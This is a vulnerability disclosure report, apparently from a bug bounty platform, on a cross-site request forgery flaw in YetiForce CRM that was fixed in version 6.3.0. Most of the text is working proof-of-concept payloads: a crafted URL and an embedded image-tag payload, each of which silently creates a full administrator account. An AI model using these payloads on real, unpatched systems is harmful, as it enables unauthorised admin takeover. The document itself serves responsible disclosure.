Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm

Valid

Reported on

Jan 12th 2022

Description

Hi there, I would like to report a CSRF vulnerability in yetiforcecompany/yetiforcecrm. This allows an attacker to create a new admin. Even when SameSite: Strict enable, this still can be exploited by an attacker with lowest privilege account (E.g. guest).

Proof of Concept

These are POCs for 2 scenario, both leads to create a new admin with username testggwp and password Admin@123.
Scenario 1: SameSite is None or Lax
Trick admin to access below link

/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&email1=testggwp@user.com&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions=

Scenario 2: Samesiteis Strict
Create a record in Documents with below payload in description (click source then paste). After that, trick Admin to visit the record.

<img src="/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&email1=testggwp@user.com&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions=">

Impact

After csrf payload is triggered, attacker can become an admin with full privilege.

References

video poc for scenario 2 (samesite: strict)

We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours. 2 years ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago

We have contacted a member of the yetiforcecompany/yetiforcecrm team and are waiting to hear back 2 years ago

We have sent a follow up to the yetiforcecompany/yetiforcecrm team. We will try again in 7 days. 2 years ago

Radosław Skrzypczak Radosław

commented 2 years ago

Maintainer

Thank you for the report, We're currently working on a fix that will be released soon and then we'll take care of this report. Thanks.

Radosław Skrzypczak validated this vulnerability 2 years ago

supernaruto16 has been awarded the disclosure bounty

The fix bounty is now up for grabs

Radosław Skrzypczak marked this as fixed in 6.3.0 with commit 298c78 2 years ago

Radosław Skrzypczak has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation